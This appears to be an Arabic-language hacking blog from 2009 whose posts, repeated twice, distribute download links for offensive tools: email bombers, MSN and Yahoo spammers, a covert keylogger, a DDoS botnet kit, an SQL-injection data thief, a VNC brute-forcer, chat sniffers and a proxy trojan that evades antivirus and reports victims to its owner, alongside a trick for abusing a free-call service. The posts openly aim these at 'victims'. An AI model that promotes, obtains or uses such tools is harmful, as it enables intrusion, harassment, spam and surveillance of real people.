يتم التشغيل بواسطة Blogger.

آخر الحلقات عن الفيسبوك

آخر حلقات الويندوز

الاقسام

آخر الحلقات الحصرية

صوت وصورة

أخبار المشاهير

توقيت المغرب

رياضة عالمية

Main Post

آخر الحلقات عن الانترنت

آخر حلقات الحماية من الهاكرز

أقسام

Send Quick Massage

الاسم

بريد إلكتروني *

رسالة *

إشترك بالمدونة

الكتاب الرسميون

الدولي

آخر الحلقات عن منتجات جوجل

المشاركات الشائعة

عن الموقع

my

Visitors

الاثنين، 17 أغسطس 2009

يقدم موقع
youcall
خدمة متميزة في الإتصالات المجانية
تصل حتى
30 دقيقة مجانا
من الهاتف الجوال إلى هاتف جوال أخر
من الهاتف الجوال إلى الهاتف الثابت
من الهاتف الثابت إلى الهاتف الثابت
من الهاتف الثابت إلى الهاتف الجوال
نحو كل الشبكات
حتى تتمكن من التسجيل كل مرة قم فقط بإعادة تشغيل الأنترنت
(déconnecter)
لكي يتغيرعنوانك
أي رقم ip
الخاص بك
www.youcall.com
تنبيه:الحصول الدائم للخدمة مرهون بفتحك لعدة (msn)
أو تغيير إستعمال رقم الهاتف بإستعمال رقم أخر لديك


للتسجيل اضغط هنا 




ستظهر لك هده الصفحة



ادهب الى بريدك الالكتروني



ثم







ستتلقى اتصال برقم مخفي 



يطلب منك ان تكتب الكود


الأحد، 16 أغسطس 2009

Bifrost tuto

السبت، 15 أغسطس 2009








TriCk! Browser v1



submitted by _TRiCk!_ on 8/6/2009



i am currently learning c++ and VB.NET, so i thought il start of by making a hackers based browser, i got a better version but im still in the proccess of adding other stuff and making it look better etc.

TriCk Browser v1:
- Built in google search
- Built in milw0rm search (to search for vuln web-apps/programs and the latest exploits etc)
- Built in who.is
- Built in Reverse ip
Standard browser Buttons: GO!, Back, Forward, Home, Stop
Right Click Functions: same as internet explorer
known bugs:
- some sites load slow (fixed in next version)
- when clicking some links they open in firefox or ie (fixed in next version)

Screenshot:

Download: http://www.speedyshare.com/817265447.html
CREATED BY TRICK AKA SAYWHAT? - NIPZ.ORG








submitted by _TRiCk!_ on 8/13/2009



im currently learning c++ and vb.net, i made a basic hackers based browser which i released earlier and now i made this, enjoy:
Need:
- Gmail acc
========
How to use:
- Fill all the Fields in and click BOMB EM!
- To stop click AWW STOP?
- To exit click GTFO NOW! FUNZ OVER
========
ScreenShots:
========
[B]Download: http://www.speedyshare.com/947903943.html
========
Created by TRiCk AkA Saywhat? // nipz.org //

el3ctr0M4N@hotmail.com








B3y0nd.co.uk E-Bomber



submitted by B3y0nd on 8/15/2009



B3y0nd E-Bomber is to bomb the sheiiit outta your victims by flooding their email with this tool.
Really simple tool, did not take long to make.
Lots of tutorials around if you want to make one...

Here's screenie and Download link.
=========================

Screenie:

Download:

http://rapidshare.com/files/267855196/b3y0nd.exe


Thanks,
btw this was created by Cue from www.b3y0nd.co.uk

el3ctr0M4n


electroman


mr_electroman


we are one

Image

Evil Msn Release INFO

EVILMSN

Description:
Evil Msn is an advanced msn messenger tool with many different features to make
your experience with msn better.
Feature List:

Msn Booter
Status Bomb
Nick Name Builder
Contact Options
Msn Information
Msn Scroller
Msn Defence
Msn Tweaking
Block Checker
Profile Viewer
Emotion Art
Emotion Talk
Display Picture/Emotion Thief
Desk Status
Patch Msn
And 3 BONUS Tools

Compatibilty:
Designed for Windows XP SP1
Msn Messenger 6.x 7.x

Download:

http://uploading.com/files/X80O3OME/EvilMSN 3.0.6.rar.html

Screenshot
Image

Download:

http://rapidshare.com/files/125681801/SpyYahoo-By_Outlawz.zip


This version is a bit more secure so fare no bugs.

May send slower but dont worry ^^

_____________
Features:
Can use any mailing system to send through (out going)
A bit less harsh on ur CPU ^^
Allowd to save settigns *so you dont gotta type same things in* (if doesnt work then tell me i will TRY to fix :) )
PM me if you want a gmail account to use *not giving others just 1's ive pre-made*
_____________
What may come:
I will try to make it were i can make some updates to the program from my pc so you can be updated :)
Mass mailer (sends to muli-victims)
threading (better)

Screen shot
Image

Downlaod

http://www.mediafire.com/?cn5znqykxyd


features: Log keystrokes in Firefox. Retrieve message board posts, emails, or long form entries if your browser crashes. Can set minimum length to avoid logging usernames/passwords.

The Keylogger extension allows you to log keystrokes in Firefox webpages. Never lose a message board post or email again.

This logger allows you to set a minimum length of string to log, both to avoid cluttering up your log and to avoid logging, for example, usernames and passwords.

You can also specify the number of days to store logged keystrokes. The Keylogger addon is cross-platform and it works on Mac OS X, Windows and Linux.

**Just install like a normal Firefox add on.
View the log by clicking.. Tools --> Add-ons --> Keylogger --> Options
Runs on any OS with Firefox. **

Image

SCAN: http://www.viruschief.com/report.html?r ... 5905dd24c8

DL: http://rs650tg.rapidshare.com/files/266 ... oxkl11.zip

Image

Features:
1. Monitors directory/ Files
2. Useful to monitor viral/spyware infection activities on system
3. Simple GUI
4. Setup can be done within seconds
5. Creates log for Directory/file "deleted", "renamed","created" with date time.
6. Saves log file instantly.
7. User friendly operations.
8. Very useful for system monitoring purpose.
9. Useful in system analysis.


.NET 2.0 framework is required


Download Link: [5.5 MB] (Video tutorial included)

Download

Spaming chat

Image




Password: cyberterrorists.net

الخميس، 13 أغسطس 2009

By:Security warning team(www.hackeroo.com)Development


Function on :


NetBot_Attacker Is a comprehensive pressure as well as the DDOS test attack


He may control the most PC computer to start DDOS to attack!


The main attack type has:


Ordinary attack: SYN Flood,ICMP Flood,UDP Flood,UDP small,TCP Flood,TCP multi-link


WEB Attack:HTTP No-Cache Get Flood,CC Variety attack,HTTPGET


Special attack: GAME attack,CIDR attack,Hybrid attack


Auxiliary function::


Download operation,Shutdown unloading,Open URL,All shutdown


Help:You only need to have the FTP space and may use it,


Or you are fixed IP,Or your free application dynamic domain name.


The thanks supports NetBot_Attacker,We also opened the VIP edition.


VIP service of edition end little, EXE WROM, U records of spread, Intranet travel, attack might to be further loud .


download



Code:
http://rapidshare.com/files/22099705/Ne ... h.rar.html

http://www5.hackeroo.com/NetBot_Attacker 1.4 English.rar

ta Thief V1.0 (Beta)

Data Thief uses techniques discribed in paper Manipulating MS SQL Server using SQL injection, to retrieve information from databases of web applications vulnerables to SQL injection which use SQL Server as a backend database server and doesn’t filter well outbound connections.
Data Thief will extract the data from the databases of the vulnerable web application and also it will display the data after sending the data to a SQL Server that you control.
Code:

http://rapidshare.com/files/14849283/DataThief.zip

Password : maxdemon


_________________
Image

Post :: SQLScanner Tool ::

SQLScan is a Windows GUI scanner tailored specifically to finding SQL servers
that may be vulnerable to the recent SQL "Slammer" or "SQHell" worm that
attacks vulnerable Microsoft SQL 2000 servers.

Use of the tool should be fairly self-evident. Enter a list of IP addresses
to be scanned in the IP list. You can continually add to the list and can
pull in a pre-built list of IP addresses from a file if you wish. IP addresses
in the file can be specified as single IPs (10.1.2.3), or ranges
(10.1.2.3-10.3.4.5, or 10.1.2.3-254 etc.). Right-clicking with the mouse on
the IP list window will allow you to directly paste lists of IPs from the
clipboard.

Choose which SQL port you would like to scan by entering it in the port
selection edit box. Port 1434 is used by default but this can be changed to
anything more appropriate for the network you are scanning.

When you are ready, click the Start button (right blue arrow). To stop the
scan click the Stop button (blue square).

The program will attempt to extract and display the SQL query response string
from responding hosts. If this is not able to be determined nothing will be
shown in the response field.

Right-clicking on an entry in the list of discovered hosts will bring up
a menu where you can select to copy the relevant IP address or the entire
displayed line to the clipboard.

When the scan has completed you can save the list of discovered hosts to
a file by clicking the "Save..." button at the bottom right of the window.
You can save in either HTML or comma-separated (CSV) format by choosing an
appropriate file extension. The file will be saved in the same manner as it
is displayed i.e. if you have chosen to sort the list by clicking one of
the column headers that is how it will appear in the file.

Code:

http://rapidshare.com/files/14854935/SQLScan.zip

Password : maxdemon


_________________
Image

el3ctr0M4n


Mr_electroman


electroman



we are one

Mail PassView v1.38 - by Nir Sofer
Description
Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:

* Outlook Express
* Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
* Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts)
* Windows Mail
* IncrediMail
* Eudora
* Netscape 6.x/7.x
* Mozilla Thunderbird
* Group Mail Free
* Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
* Hotmail/MSN mail - If the password is saved in MSN Messenger application.
* Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

For each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name, and the Password.



Image

::DowNLOaD::


http://www.nirsoft.net/utils/mailpv.zip





::HomePage::


http://www.nirsoft.net/



By


electroman


Mr_electroman


el3ctr0M4N


We Are One

VNCrack is what it looks like: crack VNC.
The usual Phenoelit stuff again - brute force the hell out of a server. Additional, you may pass a Registry key with the encrypted password or the UNIX password file to VNCrack and it does this simple fixed key decryption for you.

Well, this time we came around the 'cannot assign requested address' - when it happens, we wait 'til all the connections are returned from TIME_WAIT and continue.

After the VNC development team get their point by adding authorization failure counters to VNC, the tool is mostly usefull against older versions and in cooperation with PHoss.


::DownLOad::
http://phenoelit.de/vncrack/download.html
::HomePage::
http://phenoelit.de/


By


electroman


Mr electroman


El3ctr0M4N


We Are One

MSn YAhoo AIM msn sniffer

with this appz u can spy on your network's users , tested 100% working :lol:

Image
Image
Image
Image
Image

yahoo sniffer
http://rapidshare.com/files/26028473/ya ... r.rar.html
msn sniffer
http://rapidshare.com/files/26028659/ms ... r.rar.html
AIM sniffer
http://rapidshare.com/files/26028884/ai ... r.rar.html
yahoo spy
http://rapidshare.com/files/26029178/yahoo_spy.rar.html

By


Electroman


Mr_electroman


El3ctr0M4N


We Are One


الثلاثاء، 11 أغسطس 2009



Image

Image

Image

Image

Image

Image

fEATURES :)
*100% PORTABLE FOR ALL OS LANGUAGES
*DO NOT TOUCH THE INSTALED VERSION
*AFTER USE DELETE ALL
*BUILD A UPDATED COPY OF MDF
*SAVED CONFIGS

ENJOY!


http://rapidshare.de/files/41158625/MSF ... _.exe.html



I noticed a backdoored version here, but i think this one is clean.



Checked with novirusthanks,vriustotal,anubis and wireshark.
I can't find a ftp connection.

http://rapidshare.com/files/206291741/RapidShare_Account_Checker.exe.html


electroman

3.0 gb hacking video & tools collection

http://rapidshare.com/files/125097814/a ... 1.rar.html
http://rapidshare.com/files/125097817/a ... 2.rar.html
http://rapidshare.com/files/125097819/a ... 3.rar.html
http://rapidshare.com/files/125097818/a ... 4.rar.html
http://rapidshare.com/files/125100735/a ... 5.rar.html
http://rapidshare.com/files/125102867/a ... 6.rar.html
http://rapidshare.com/files/125102910/a ... 7.rar.html
http://rapidshare.com/files/125102917/a ... 8.rar.html
http://rapidshare.com/files/125102978/a ... 9.rar.html
http://rapidshare.com/files/125106027/a ... 0.rar.html
http://rapidshare.com/files/125108252/a ... 1.rar.html
http://rapidshare.com/files/125108277/a ... 2.rar.html
http://rapidshare.com/files/125108320/a ... 3.rar.html
http://rapidshare.com/files/125108346/a ... 4.rar.html
http://rapidshare.com/files/125111493/a ... 5.rar.html
http://rapidshare.com/files/125113960/a ... 6.rar.html
http://rapidshare.com/files/125113973/a ... 7.rar.html
http://rapidshare.com/files/125114065/a ... 8.rar.html
http://rapidshare.com/files/125114075/a ... 9.rar.html
http://rapidshare.com/files/125117328/a ... 0.rar.html
http://rapidshare.com/files/125119857/a ... 1.rar.html
http://rapidshare.com/files/125119883/a ... 2.rar.html
http://rapidshare.com/files/125119944/a ... 3.rar.html
http://rapidshare.com/files/125119962/a ... 4.rar.html
http://rapidshare.com/files/125123508/a ... 5.rar.html
http://rapidshare.com/files/125126287/a ... 6.rar.html
http://rapidshare.com/files/125126294/a ... 7.rar.html
http://rapidshare.com/files/125091215/a ... 8.rar.html
http://rapidshare.com/files/125091217/a ... 9.rar.html
http://rapidshare.com/files/125096635/a ... 0.rar.html

size :- 100 mb each
password for files :- www.astalavista.com

el3ctr0M4N


Image

Features

* All versions of RAR are supported including 3.x Updated!
* Brute-Force, Xieveâ„¢ or Dictionary attacks are used to recover the password
* Additional user dictionaries support, case changes, multiple mistypes and other modifications for each dictionary word
* Program automatically saves password search state and can resume after a stop or a crash
* Patterns can be used to minimize search time if any part of the password is known
* Non-English characters in passwords are supported
* Full install/uninstall support

RAR Key recovers passwords for RAR archives.

http://www.lostpassword.com/demos/rarkeyd.exe

Mr electroman

Yahoo! Spammer

Yahoo! Spammer



Image

Code:

http://www.mediafire.com/?nqyz1zezrno





Download url: http://mangga-dua.com/images/kurniawan/ ... _setup.rar
Image
A simple GUI port scanner by mywisdom....enjoy
run in ms windows 9x,xp..havent tested on vista yet..if can not run on vista..try to compile the source.
Download url: http://mangga-dua.com/images/kurniawan/ ... _setup.rar
Download source code : http://mangga-dua.com/images/kurniawan/ ... source.rar

Mr electroman



THE ART OF DECEPTION
Controlling the Human Element of Security
KEVIN D. MITNICK
& William L. Simon
Foreword by Steve Wozniak

For Reba Vartanian, Shelly Jaffe, Chickie Leventhal, and Mitchell
Mitnick, and for the late Alan Mitnick, Adam Mitnick, and Jack Biello

For Arynne, Victoria, and David, Sheldon,Vincent, and Elena.

Social Engineering
Social Engineering uses influence and persuasion to deceive people
by convincing them that the social engineer is someone he is not,
or by manipulation. As a result, the social engineer is able to take
advantage of people to obtain information with or without the use of
technology.


Code:

http://rapidshare.com/files/65452273/The_Art_of_Deception_by_Kevin_D._Mitnick.pdf

Hi mates,

Here is the online sql injection tool for ASP | CFM ::::: Hope you like this great stuff.


Code:

http://darkmagica.110mb.com/index.html




Image

Good Luck Mates

Peace :peace:

Mr Electroman


Download


pass

unkn0wn.ws

By Mr Electroman

This tool create a fully proxy trojan to use as private proxy..
The trojan has just only about 47kb (no icon)!
Coded by me with VB.NET and C# (.net framework v.2)

Features:
-Fully proxy server trojan with Hijacking EXE with embebbed the trojan;
-Supports multi-listening ports;
-Supports multi-connections from various clients (multi-thread system);
-Supports cookies;
-Supports SSL;
-Report IP/Ports to mail of the trojan owner.
-Assembly Manipulation(version info, change icon, etc..);
-Trojan compressed binary (anti-embebbed detection AV);
-Etc..

Screen Shots:
Image

Download Link:




Code:

http://rapidshare.com/files/213580057/W3bPrOxy_Tr0j4n_v.1.2.rar


mr electroman

الثلاثاء، 4 أغسطس 2009

CEH



If you want to stop hackers from invading your network, first you’ve got to invade their minds.


The CEH Program certifies individuals in the specific network security discipline of Ethical hacking from a vendor-neutral perspective. The Certified Ethical hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.


Download Links


http://rapidshare.com/files/27445021/Certified_Ethical_Hacker_Lab_3.0.part01.rar
http://rapidshare.com/files/27445043/Certified_Ethical_Hacker_Lab_3.0.part02.rar
http://rapidshare.com/files/27448148/Certified_Ethical_Hacker_Lab_3.0.part03.rar
http://rapidshare.com/files/27448136/Certified_Ethical_Hacker_Lab_3.0.part04.rar
http://rapidshare.com/files/27452154/Certified_Ethical_Hacker_Lab_3.0.part05.rar
http://rapidshare.com/files/27452159/Certified_Ethical_Hacker_Lab_3.0.part06.rar
http://rapidshare.com/files/27455943/Certified_Ethical_Hacker_Lab_3.0.part07.rar
http://rapidshare.com/files/27455952/Certified_Ethical_Hacker_Lab_3.0.part08.rar
http://rapidshare.com/files/27459009/Certified_Ethical_Hacker_Lab_3.0.part09.rar
http://rapidshare.com/files/27458158/Certified_Ethical_Hacker_Lab_3.0.part10.rar



You don’t know how to decrypt passfile that you get from some shell? Simply check this tutorial and you’ll know most of things about decrypting using JTR.


Download



IPView



The IPView application was designed to show your IP-address in the traybar. This version is capable of showing multiple IP-addresses. When started, IPView will put an icon in the traybar (next to the clock).If you move your mouse over the icon, you’ll see your IP-address. However,sometimes your computer will have more than one IP-address (e.g. if you have an ethernet card).


Download



التصنيفات


يقدم موقع
youcall
خدمة متميزة في الإتصالات المجانية
تصل حتى
30 دقيقة مجانا
من الهاتف الجوال إلى هاتف جوال أخر
من الهاتف الجوال إلى الهاتف الثابت
من الهاتف الثابت إلى الهاتف الثابت
من الهاتف الثابت إلى الهاتف الجوال
نحو كل الشبكات
حتى تتمكن من التسجيل كل مرة قم فقط بإعادة تشغيل الأنترنت
(déconnecter)
لكي يتغيرعنوانك
أي رقم ip
الخاص بك
www.youcall.com
تنبيه:الحصول الدائم للخدمة مرهون بفتحك لعدة (msn)
أو تغيير إستعمال رقم الهاتف بإستعمال رقم أخر لديك


للتسجيل اضغط هنا 




ستظهر لك هده الصفحة



ادهب الى بريدك الالكتروني



ثم







ستتلقى اتصال برقم مخفي 



يطلب منك ان تكتب الكود


Bifrost tuto








TriCk! Browser v1



submitted by _TRiCk!_ on 8/6/2009



i am currently learning c++ and VB.NET, so i thought il start of by making a hackers based browser, i got a better version but im still in the proccess of adding other stuff and making it look better etc.

TriCk Browser v1:
- Built in google search
- Built in milw0rm search (to search for vuln web-apps/programs and the latest exploits etc)
- Built in who.is
- Built in Reverse ip
Standard browser Buttons: GO!, Back, Forward, Home, Stop
Right Click Functions: same as internet explorer
known bugs:
- some sites load slow (fixed in next version)
- when clicking some links they open in firefox or ie (fixed in next version)

Screenshot:

Download: http://www.speedyshare.com/817265447.html
CREATED BY TRICK AKA SAYWHAT? - NIPZ.ORG








submitted by _TRiCk!_ on 8/13/2009



im currently learning c++ and vb.net, i made a basic hackers based browser which i released earlier and now i made this, enjoy:
Need:
- Gmail acc
========
How to use:
- Fill all the Fields in and click BOMB EM!
- To stop click AWW STOP?
- To exit click GTFO NOW! FUNZ OVER
========
ScreenShots:
========
[B]Download: http://www.speedyshare.com/947903943.html
========
Created by TRiCk AkA Saywhat? // nipz.org //

el3ctr0M4N@hotmail.com








B3y0nd.co.uk E-Bomber



submitted by B3y0nd on 8/15/2009



B3y0nd E-Bomber is to bomb the sheiiit outta your victims by flooding their email with this tool.
Really simple tool, did not take long to make.
Lots of tutorials around if you want to make one...

Here's screenie and Download link.
=========================

Screenie:

Download:

http://rapidshare.com/files/267855196/b3y0nd.exe


Thanks,
btw this was created by Cue from www.b3y0nd.co.uk

el3ctr0M4n


electroman


mr_electroman


we are one

Image

Evil Msn Release INFO

EVILMSN

Description:
Evil Msn is an advanced msn messenger tool with many different features to make
your experience with msn better.
Feature List:

Msn Booter
Status Bomb
Nick Name Builder
Contact Options
Msn Information
Msn Scroller
Msn Defence
Msn Tweaking
Block Checker
Profile Viewer
Emotion Art
Emotion Talk
Display Picture/Emotion Thief
Desk Status
Patch Msn
And 3 BONUS Tools

Compatibilty:
Designed for Windows XP SP1
Msn Messenger 6.x 7.x

Download:

http://uploading.com/files/X80O3OME/EvilMSN 3.0.6.rar.html

Screenshot
Image

Download:

http://rapidshare.com/files/125681801/SpyYahoo-By_Outlawz.zip


This version is a bit more secure so fare no bugs.

May send slower but dont worry ^^

_____________
Features:
Can use any mailing system to send through (out going)
A bit less harsh on ur CPU ^^
Allowd to save settigns *so you dont gotta type same things in* (if doesnt work then tell me i will TRY to fix :) )
PM me if you want a gmail account to use *not giving others just 1's ive pre-made*
_____________
What may come:
I will try to make it were i can make some updates to the program from my pc so you can be updated :)
Mass mailer (sends to muli-victims)
threading (better)

Screen shot
Image

Downlaod

http://www.mediafire.com/?cn5znqykxyd


features: Log keystrokes in Firefox. Retrieve message board posts, emails, or long form entries if your browser crashes. Can set minimum length to avoid logging usernames/passwords.

The Keylogger extension allows you to log keystrokes in Firefox webpages. Never lose a message board post or email again.

This logger allows you to set a minimum length of string to log, both to avoid cluttering up your log and to avoid logging, for example, usernames and passwords.

You can also specify the number of days to store logged keystrokes. The Keylogger addon is cross-platform and it works on Mac OS X, Windows and Linux.

**Just install like a normal Firefox add on.
View the log by clicking.. Tools --> Add-ons --> Keylogger --> Options
Runs on any OS with Firefox. **

Image

SCAN: http://www.viruschief.com/report.html?r ... 5905dd24c8

DL: http://rs650tg.rapidshare.com/files/266 ... oxkl11.zip

Image

Features:
1. Monitors directory/ Files
2. Useful to monitor viral/spyware infection activities on system
3. Simple GUI
4. Setup can be done within seconds
5. Creates log for Directory/file "deleted", "renamed","created" with date time.
6. Saves log file instantly.
7. User friendly operations.
8. Very useful for system monitoring purpose.
9. Useful in system analysis.


.NET 2.0 framework is required


Download Link: [5.5 MB] (Video tutorial included)

Download

Spaming chat

Image




Password: cyberterrorists.net

By:Security warning team(www.hackeroo.com)Development


Function on :


NetBot_Attacker Is a comprehensive pressure as well as the DDOS test attack


He may control the most PC computer to start DDOS to attack!


The main attack type has:


Ordinary attack: SYN Flood,ICMP Flood,UDP Flood,UDP small,TCP Flood,TCP multi-link


WEB Attack:HTTP No-Cache Get Flood,CC Variety attack,HTTPGET


Special attack: GAME attack,CIDR attack,Hybrid attack


Auxiliary function::


Download operation,Shutdown unloading,Open URL,All shutdown


Help:You only need to have the FTP space and may use it,


Or you are fixed IP,Or your free application dynamic domain name.


The thanks supports NetBot_Attacker,We also opened the VIP edition.


VIP service of edition end little, EXE WROM, U records of spread, Intranet travel, attack might to be further loud .


download



Code:
http://rapidshare.com/files/22099705/Ne ... h.rar.html

http://www5.hackeroo.com/NetBot_Attacker 1.4 English.rar

ta Thief V1.0 (Beta)

Data Thief uses techniques discribed in paper Manipulating MS SQL Server using SQL injection, to retrieve information from databases of web applications vulnerables to SQL injection which use SQL Server as a backend database server and doesn’t filter well outbound connections.
Data Thief will extract the data from the databases of the vulnerable web application and also it will display the data after sending the data to a SQL Server that you control.
Code:

http://rapidshare.com/files/14849283/DataThief.zip

Password : maxdemon


_________________
Image

Post :: SQLScanner Tool ::

SQLScan is a Windows GUI scanner tailored specifically to finding SQL servers
that may be vulnerable to the recent SQL "Slammer" or "SQHell" worm that
attacks vulnerable Microsoft SQL 2000 servers.

Use of the tool should be fairly self-evident. Enter a list of IP addresses
to be scanned in the IP list. You can continually add to the list and can
pull in a pre-built list of IP addresses from a file if you wish. IP addresses
in the file can be specified as single IPs (10.1.2.3), or ranges
(10.1.2.3-10.3.4.5, or 10.1.2.3-254 etc.). Right-clicking with the mouse on
the IP list window will allow you to directly paste lists of IPs from the
clipboard.

Choose which SQL port you would like to scan by entering it in the port
selection edit box. Port 1434 is used by default but this can be changed to
anything more appropriate for the network you are scanning.

When you are ready, click the Start button (right blue arrow). To stop the
scan click the Stop button (blue square).

The program will attempt to extract and display the SQL query response string
from responding hosts. If this is not able to be determined nothing will be
shown in the response field.

Right-clicking on an entry in the list of discovered hosts will bring up
a menu where you can select to copy the relevant IP address or the entire
displayed line to the clipboard.

When the scan has completed you can save the list of discovered hosts to
a file by clicking the "Save..." button at the bottom right of the window.
You can save in either HTML or comma-separated (CSV) format by choosing an
appropriate file extension. The file will be saved in the same manner as it
is displayed i.e. if you have chosen to sort the list by clicking one of
the column headers that is how it will appear in the file.

Code:

http://rapidshare.com/files/14854935/SQLScan.zip

Password : maxdemon


_________________
Image

el3ctr0M4n


Mr_electroman


electroman



we are one

Mail PassView v1.38 - by Nir Sofer
Description
Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:

* Outlook Express
* Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
* Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts)
* Windows Mail
* IncrediMail
* Eudora
* Netscape 6.x/7.x
* Mozilla Thunderbird
* Group Mail Free
* Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
* Hotmail/MSN mail - If the password is saved in MSN Messenger application.
* Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

For each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name, and the Password.



Image

::DowNLOaD::


http://www.nirsoft.net/utils/mailpv.zip





::HomePage::


http://www.nirsoft.net/



By


electroman


Mr_electroman


el3ctr0M4N


We Are One

VNCrack is what it looks like: crack VNC.
The usual Phenoelit stuff again - brute force the hell out of a server. Additional, you may pass a Registry key with the encrypted password or the UNIX password file to VNCrack and it does this simple fixed key decryption for you.

Well, this time we came around the 'cannot assign requested address' - when it happens, we wait 'til all the connections are returned from TIME_WAIT and continue.

After the VNC development team get their point by adding authorization failure counters to VNC, the tool is mostly usefull against older versions and in cooperation with PHoss.


::DownLOad::
http://phenoelit.de/vncrack/download.html
::HomePage::
http://phenoelit.de/


By


electroman


Mr electroman


El3ctr0M4N


We Are One

MSn YAhoo AIM msn sniffer

with this appz u can spy on your network's users , tested 100% working :lol:

Image
Image
Image
Image
Image

yahoo sniffer
http://rapidshare.com/files/26028473/ya ... r.rar.html
msn sniffer
http://rapidshare.com/files/26028659/ms ... r.rar.html
AIM sniffer
http://rapidshare.com/files/26028884/ai ... r.rar.html
yahoo spy
http://rapidshare.com/files/26029178/yahoo_spy.rar.html

By


Electroman


Mr_electroman


El3ctr0M4N


We Are One




Image

Image

Image

Image

Image

Image

fEATURES :)
*100% PORTABLE FOR ALL OS LANGUAGES
*DO NOT TOUCH THE INSTALED VERSION
*AFTER USE DELETE ALL
*BUILD A UPDATED COPY OF MDF
*SAVED CONFIGS

ENJOY!


http://rapidshare.de/files/41158625/MSF ... _.exe.html



I noticed a backdoored version here, but i think this one is clean.



Checked with novirusthanks,vriustotal,anubis and wireshark.
I can't find a ftp connection.

http://rapidshare.com/files/206291741/RapidShare_Account_Checker.exe.html


electroman

3.0 gb hacking video & tools collection

http://rapidshare.com/files/125097814/a ... 1.rar.html
http://rapidshare.com/files/125097817/a ... 2.rar.html
http://rapidshare.com/files/125097819/a ... 3.rar.html
http://rapidshare.com/files/125097818/a ... 4.rar.html
http://rapidshare.com/files/125100735/a ... 5.rar.html
http://rapidshare.com/files/125102867/a ... 6.rar.html
http://rapidshare.com/files/125102910/a ... 7.rar.html
http://rapidshare.com/files/125102917/a ... 8.rar.html
http://rapidshare.com/files/125102978/a ... 9.rar.html
http://rapidshare.com/files/125106027/a ... 0.rar.html
http://rapidshare.com/files/125108252/a ... 1.rar.html
http://rapidshare.com/files/125108277/a ... 2.rar.html
http://rapidshare.com/files/125108320/a ... 3.rar.html
http://rapidshare.com/files/125108346/a ... 4.rar.html
http://rapidshare.com/files/125111493/a ... 5.rar.html
http://rapidshare.com/files/125113960/a ... 6.rar.html
http://rapidshare.com/files/125113973/a ... 7.rar.html
http://rapidshare.com/files/125114065/a ... 8.rar.html
http://rapidshare.com/files/125114075/a ... 9.rar.html
http://rapidshare.com/files/125117328/a ... 0.rar.html
http://rapidshare.com/files/125119857/a ... 1.rar.html
http://rapidshare.com/files/125119883/a ... 2.rar.html
http://rapidshare.com/files/125119944/a ... 3.rar.html
http://rapidshare.com/files/125119962/a ... 4.rar.html
http://rapidshare.com/files/125123508/a ... 5.rar.html
http://rapidshare.com/files/125126287/a ... 6.rar.html
http://rapidshare.com/files/125126294/a ... 7.rar.html
http://rapidshare.com/files/125091215/a ... 8.rar.html
http://rapidshare.com/files/125091217/a ... 9.rar.html
http://rapidshare.com/files/125096635/a ... 0.rar.html

size :- 100 mb each
password for files :- www.astalavista.com

el3ctr0M4N


Image

Features

* All versions of RAR are supported including 3.x Updated!
* Brute-Force, Xieveâ„¢ or Dictionary attacks are used to recover the password
* Additional user dictionaries support, case changes, multiple mistypes and other modifications for each dictionary word
* Program automatically saves password search state and can resume after a stop or a crash
* Patterns can be used to minimize search time if any part of the password is known
* Non-English characters in passwords are supported
* Full install/uninstall support

RAR Key recovers passwords for RAR archives.

http://www.lostpassword.com/demos/rarkeyd.exe

Mr electroman

Yahoo! Spammer

Yahoo! Spammer



Image

Code:

http://www.mediafire.com/?nqyz1zezrno





Download url: http://mangga-dua.com/images/kurniawan/ ... _setup.rar
Image
A simple GUI port scanner by mywisdom....enjoy
run in ms windows 9x,xp..havent tested on vista yet..if can not run on vista..try to compile the source.
Download url: http://mangga-dua.com/images/kurniawan/ ... _setup.rar
Download source code : http://mangga-dua.com/images/kurniawan/ ... source.rar

Mr electroman



THE ART OF DECEPTION
Controlling the Human Element of Security
KEVIN D. MITNICK
& William L. Simon
Foreword by Steve Wozniak

For Reba Vartanian, Shelly Jaffe, Chickie Leventhal, and Mitchell
Mitnick, and for the late Alan Mitnick, Adam Mitnick, and Jack Biello

For Arynne, Victoria, and David, Sheldon,Vincent, and Elena.

Social Engineering
Social Engineering uses influence and persuasion to deceive people
by convincing them that the social engineer is someone he is not,
or by manipulation. As a result, the social engineer is able to take
advantage of people to obtain information with or without the use of
technology.


Code:

http://rapidshare.com/files/65452273/The_Art_of_Deception_by_Kevin_D._Mitnick.pdf

Hi mates,

Here is the online sql injection tool for ASP | CFM ::::: Hope you like this great stuff.


Code:

http://darkmagica.110mb.com/index.html




Image

Good Luck Mates

Peace :peace:

Mr Electroman

This tool create a fully proxy trojan to use as private proxy..
The trojan has just only about 47kb (no icon)!
Coded by me with VB.NET and C# (.net framework v.2)

Features:
-Fully proxy server trojan with Hijacking EXE with embebbed the trojan;
-Supports multi-listening ports;
-Supports multi-connections from various clients (multi-thread system);
-Supports cookies;
-Supports SSL;
-Report IP/Ports to mail of the trojan owner.
-Assembly Manipulation(version info, change icon, etc..);
-Trojan compressed binary (anti-embebbed detection AV);
-Etc..

Screen Shots:
Image

Download Link:




Code:

http://rapidshare.com/files/213580057/W3bPrOxy_Tr0j4n_v.1.2.rar


mr electroman

CEH



If you want to stop hackers from invading your network, first you’ve got to invade their minds.


The CEH Program certifies individuals in the specific network security discipline of Ethical hacking from a vendor-neutral perspective. The Certified Ethical hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.


Download Links


